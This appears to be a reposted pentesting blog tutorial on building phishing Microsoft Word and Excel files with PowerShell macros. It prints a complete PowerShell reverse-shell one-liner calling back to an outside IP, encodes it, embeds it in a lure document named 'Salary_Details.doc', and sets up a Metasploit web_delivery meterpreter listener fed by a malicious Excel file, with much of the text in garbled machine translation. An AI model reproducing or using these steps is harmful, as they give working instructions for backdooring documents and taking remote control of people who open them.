powershell phishing,Phishing with Macros and Powershell,macro microsoft word

Introduction

Windows PowerShell is a command-line shell for Microsoft Windows that is used for system administration. It uses cmdlets (commandlets) that are .NET classes to perform administrative tasks, and can access COM and WMI for local and remote administration. PowerShell can also be embedded within applications to make use of its abilities. PowerShell originated in 2006 when Monad (Microsoft Shell) was renamed to Windows PowerShell.

Making Microsoft Word phishing files

Download powercat (netshell features all in version 2 powershell)

Load powercat

PS G:\github\Pentest\powershell\powercat-master> . .\powercat.ps1
PS G:\github\Pentest\powershell\powercat-master> powercat
You must select either client mode (-c) or listen mode (-l).

After loading the use of powercat to open the monitor:

PS G:\github\Pentest\powershell\powercat-master> powercat -l -v -p 4444
Verbose: Set Stream 1: TCP
Verbose: Set Stream 2: Console
Verbose: Setting up Stream 1…
Verbose: Listening on [0.0.0.0] (port 4444)

Test to load Invoke-PowerShellTcp and execute:

PS G:\github\Pentest\powershell\nishang-master\Shells> . .\Invoke-PowerShellTcp.ps1
PS G:\github\Pentest\powershell\nishang-master\Shells> Invoke-PowerShellTcp -Reverse -IPAddress 127.0.0.1 -Port 4444

Can be found directly to get a powerhell shell. The following production of word files. Copy nishang in the Invoke-PowerShellTcpOneLine.ps1 client code, as follows:

$client = New-Object System.Net.Sockets.TCPClient(“192.168.52.129”,4444);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + “PS ” + (pwd).Path + “> “;$sendbyte = (::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()

Use Invoke-Encode.ps1 to encode, before encoding to remember to modify the ip and their own to monitor the port

PS G:\github\Pentest\powershell\nishang-master\Shells> cd ..\Utility\
PS G:\github\Pentest\powershell\nishang-master\Utility> . .\Invoke-Encode.ps1
PS G:\github\Pentest\powershell\nishang-master\Utility> Invoke-Encode -DataToEncode ‘$client = New-Object System.Net.Sockets.TCPClient(“192.1
68.52.129”,4444);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$da
ta = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendb
ack + “PS ” + (pwd).Path + “> “;$sendbyte = (::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream
.Flush()};$client.Close()’ -IsString -PostScriptCommand
Encoded data written to .\encoded.txt
Encoded command written to .\encodedcommand.txt

Copy the encoded code and the code is as follows:

Invoke-Expression $(New-Object IO.StreamReader ($(New-Object IO.Compression.DeflateStream ($(New-Object IO.MemoryStream (,$([Convert]::FromBase64String(‘TVHNasJAEL4X+g5DSMsuNUtMG6mGCm1oi1CiNEIP4mFNBpMao5gRFfXdu5uY1L3MMHx/M2tGWYo5wQsEuLOGs1+MCMJDQbgUAZIIV9ECqRBjf+SXSGa0u45od56Fq4rTNVpP6nHPLGiDcqmEzEpSfCKF5YxxbzI7EE6mU1PXQoFsITqu++ie7o722dslaYaMmammV0LiG2XMKnwL7BZUrfjCfE4J52DlCDY/emYsSSoeu1rAGh/WGMgl1quMcU/iNfQHg/c8WsVpPueXfKqtXbRJqjfBPJ7JaKFFU9xD5eD079twguGWrIoGV1AHyuQ18QGMUQiGqmy9i7kYSUr0sA/GhaMMtfyEdDC8ZJr2emXGMtubzsT+HZoTi59NSsgaHZW76evzNNiPbFskjJ+9+lf8bFUg47c3fw==’)))), [IO.Compression.CompressionMode]::Decompress)), [Text.Encoding]::ASCII)).ReadToEnd();

Load Out-Word.ps1 and generate the back door, here should pay attention to the payload inside the single quotation marks plus a single quotation mark!

PS G:\github\Pentest\powershell\nishang-master\Utility> . ..\Client\Out-Word.ps1
PS G:\github\Pentest\powershell\nishang-master\Utility> Out-Word -Payload ‘powershell -c Invoke-Expression $(New-Object IO.StreamReader ($(New-Object IO.Compression.DeflateStream ($(New-Object IO.MemoryStream (,$([Convert]::FromBase64String(”TVHNasJAEL4X+g5DSMsuNUtMG6mGCm1oi1CiNEIP4mFNBpMao5gRFfXdu5uY1L3MMHx/M2tGWYo5wQsEuLOGs1+MCMJDQbgUAZIIV9ECqRBjf+SXSGa0u45od56Fq4rTNVpP6nHPLGiDcqmEzEpSfCKF5YxxbzI7EE6mU1PXQoFsITqu++ie7o722dslaYaMmammV0LiG2XMKnwL7BZUrfjCfE4J52DlCDY/emYsSSoeu1rAGh/WGMgl1quMcU/iNfQHg/c8WsVpPueXfKqtXbRJqjfBPJ7JaKFFU9xD5eD079twguGWrIoGV1AHyuQ18QGMUQiGqmy9i7kYSUr0sA/GhaMMtfyEdDC8ZJr2emXGMtubzsT+HZoTi59NSsgaHZW76evzNNiPbFskjJ+9+lf8bFUg47c3fw==”)))), [IO.Compression.CompressionMode]::Decompress)), [Text.Encoding]::ASCII)).ReadToEnd();’
Saved to file G:\github\Pentest\powershell\nishang-master\Utility\Salary_Details.doc
0
PS G:\github\Pentest\powershell\nishang-master\Utility>

After the implementation of the word, it will rebound shell.

Getting the rally of the powershell can be easily upgraded to the metaploit meterpreter.

Making Microsoft Excel phishing files

First use msf web_delivery to open a powershell monitor:

msf > use exploit/multi/script/web_delivery
msf exploit(web_delivery) > set target 2
target => 2
msf exploit(web_delivery) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(web_delivery) > set LHOST 192.168.52.129
LHOST => 192.168.52.129
msf exploit(web_delivery) > set URIPATH /
URIPATH =>
msf exploit(web_delivery) > exploit

Use Out-Excel.ps1 to make excel phishing files:

PS D:\temp> . .\Out-Excel.ps1
PS D:\temp> Out-Excel -PayloadURL http://ift.tt/1KImPSW -OutputFile D:\temp\test.xls
Saved to file D:\temp\test.xls

http://ift.tt/1KImPSW address is msf open service address. Run excel, get the meterpreter session as shown below:

The post Use Powershell for effective phishing appeared first on Penetration Testing in Linux. http://ift.tt/2qtSB0s http://ift.tt/2aM8QhC

Anúncios

Deixe um comentário

Preencha os seus dados abaixo ou clique em um ícone para log in:

Logotipo do WordPress.com

Você está comentando utilizando sua conta WordPress.com. Sair / Alterar )

Imagem do Twitter

Você está comentando utilizando sua conta Twitter. Sair / Alterar )

Foto do Facebook

Você está comentando utilizando sua conta Facebook. Sair / Alterar )

Foto do Google+

Você está comentando utilizando sua conta Google+. Sair / Alterar )

Conectando a %s